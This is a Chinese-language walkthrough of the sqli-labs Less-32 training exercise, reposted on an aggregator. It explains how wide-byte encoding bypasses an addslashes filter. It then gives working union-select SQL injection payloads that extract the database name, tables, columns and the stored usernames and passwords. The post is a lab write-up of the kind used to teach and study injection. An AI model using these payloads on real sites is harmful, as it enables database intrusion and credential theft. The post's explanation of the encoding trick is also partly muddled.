Less(32)GET - Bypass custom filter adding slashes to dangerous chars

Posted meng-yu37

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Less(32)GET - Bypass custom filter adding slashes to dangerous chars相关的知识,希望对你有一定的参考价值。

1.查看一下php文件:

  技术图片

 

   

  check_addslashes()会在单引号前加一个 例如:I‘m hacker 传入addslashes(),得到:I‘m hacker

  本题想以此阻止sql注入语句闭合,但是可以使用宽字节绕过:

  原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6‘ 这样的构造时,‘ 前面加的 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 的作用,库。

2.爆破

  (1)爆库:?id=-1%E6‘ union select 1,2,database() --+

    技术图片

  (2)爆表:?id=-1%E6‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

    技术图片

 

     需要对战ASCII码表,将security换成其对应的16进制

  (3)爆列名:?id=-1%E6‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+

    技术图片

  (4)爆值:?id=-1%E6‘ union select 1,group_concat(username,0x7e,password),3 from security.users --+

    技术图片

 

 


原文链接:https://blog.csdn.net/qq_41420747/article/details/81836327

以上是关于Less(32)GET - Bypass custom filter adding slashes to dangerous chars的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符(代

Less(33)GET-Bypass AddSlasher()

sqli-labs less35 GET- Bypass Add Slashes(we dont need them) Integer based (GET型绕过addslashes() 函数的整(代

sqli-labs less36 GET- Bypass MYSQL_real_escape_string (GET型绕过MYSQL_real_escape_string的注入)

Less(37)POST-Bypass MySQLreal escape_string

sqli-labs less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)